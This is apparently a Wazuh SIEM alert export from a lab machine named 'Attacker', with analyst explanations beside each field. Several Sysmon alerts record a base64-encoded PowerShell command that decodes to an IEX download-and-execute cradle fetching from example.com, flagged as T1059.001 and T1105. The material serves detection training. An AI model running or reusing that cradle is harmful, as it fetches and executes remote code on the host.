data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd21-680a-440b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 11516 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 56 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534250.1417547 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:28.5074564Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283821 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:28.496
ProcessGuid: {94294ddc-bd26-680a-460b-000000000e00}
ProcessId: 2020
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_1d1jb0yp.gxm.ps1
CreationUtcTime: 2025-04-24 22:37:28.496
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:28.496 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd26-680a-460b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2020 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_1d1jb0yp.gxm.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:28.496 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Special Logon' is set to include 'Success'.: Status changed from passed to 'not applicable'
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Special Logon' is set to include 'Success'.: Status changed from passed to 'not applicable' Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19012 Numeric ID of the detection rule that fired.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.5.6'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534253.1420312 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 2137254061 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26156 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit Special Logon' is set to include 'Success'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This subcategory reports when a special logon is used. A special logon is a logon that has administrator-equivalent privileges and can be used to elevate a process to a higher level. Events for this subcategory include: - 4964 : Special groups have been assigned to a new logon. The recommended state for this setting is to include: Success. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Auditing these events may be useful when investigating a security incident. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Logon/Logoff\Audit Special Logon Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.5.6 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['auditpol.exe /get /subcategory:"Special Logon"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: not applicable PASS or FAIL. Red = needs fixing.
data.sca.check.reason: Timeout overtaken running command 'auditpol.exe /get /subcategory:"Special Logon"' No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.previous_result: passed Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 53 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534254.1423149 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:31.5031620Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283846 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:30.168
ProcessGuid: {94294ddc-bd2a-680a-490b-000000000e00}
ProcessId: 10656
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd26-680a-460b-000000000e00}
ParentProcessId: 2020
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:30.168 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd2a-680a-490b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10656 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\Users\Attcker1\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd26-680a-460b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 2020 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 57 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534254.1431216 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:31.7121992Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283853 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:31.699
ProcessGuid: {94294ddc-bd2a-680a-490b-000000000e00}
ProcessId: 10656
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_pl3lg5tj.szw.ps1
CreationUtcTime: 2025-04-24 22:37:31.699
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:31.699 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd2a-680a-490b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10656 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_pl3lg5tj.szw.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:31.699 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 54 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534256.1433985 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:34.5897282Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283901 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:33.020
ProcessGuid: {94294ddc-bd2d-680a-4c0b-000000000e00}
ProcessId: 13716
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd2a-680a-490b-000000000e00}
ParentProcessId: 10656
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:33.020 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd2d-680a-4c0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13716 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd2a-680a-490b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 10656 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
